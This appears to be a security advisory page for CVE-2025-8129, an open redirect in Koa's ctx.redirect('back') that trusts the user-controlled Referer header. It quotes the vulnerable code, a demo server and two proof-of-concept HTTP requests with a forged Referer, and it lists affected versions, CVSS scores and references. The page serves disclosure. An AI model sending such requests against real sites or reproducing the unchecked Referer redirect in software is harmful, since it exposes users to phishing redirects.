CVE-2025-8129
LOW3.5EPSS 0.26%Koa Open Redirect via Referrer Header (User-Controlled)
描述
## Summary In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target. ## Details on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see: **response.redirect(url, [alt])** ``` Performs a [302] redirect to url. The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist. ctx.redirect('back'); ctx.redirect('back', '/index.html'); ctx.redirect('/login'); ctx.redirect('http://google.com'); ``` however, the "back" method is insecure: - https://github.com/koajs/koa/blob/master/lib/response.js#L322 ``` back (alt) { const url = this.ctx.get('Referrer') || alt || '/' this.redirect(url) }, ``` Referrer Header is User-Controlled. ## PoC **there is a demo for POC:** ``` const Koa = require('koa') const serve = require('koa-static') const Router = require('@koa/router') const path = require('path') const app = new Koa() const router = new Router() // Serve static files from the public directory app.use(serve(path.join(__dirname, 'public'))) // Define routes router.get('/test', ctx => { ctx.redirect('back', '/index1.html') }) router.get('/test2', ctx => { ctx.redirect('back') }) router.get('/', ctx => { ctx.body = 'Welcome to the home page! Try accessing /test, /test2' }) app.use(router.routes()) app.use(router.allowedMethods()) const port = 3000 app.listen(port, () => { console.log(`Server running at http://localhost:${port}`) }) ``` **Proof Of Concept** ``` GET /test HTTP/1.1 Host: 127.0.0.1:3000 Referer: http://www.baidu.com Connection: close GET /test2 HTTP/1.1 Host: 127.0.0.1:3000 Referer: http://www.baidu.com Connection: close ```   ## Impact https://learn.snyk.io/lesson/open-redirect/
受影響套件(1)
- npm/koa>= 2.0.0, < 2.16.2
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
| osv | CVSS 3.1 | LOW3.5 | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N |
參考連結(9)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-54420
- PATCHhttps://github.com/koajs/koa
- WEBhttps://github.com/koajs/koa/commit/422c551c63d00f24e2bbbdf492f262a5935bb1f0
- WEBhttps://github.com/koajs/koa/issues/1892
- WEBhttps://github.com/koajs/koa/issues/1892#issue-3213028583
- WEBhttps://github.com/koajs/koa/security/advisories/GHSA-jgmv-j7ww-jx2x
- WEBhttps://vuldb.com/?ctiid.317514
- WEBhttps://vuldb.com/?id.317514
- WEBhttps://vuldb.com/?submit.619741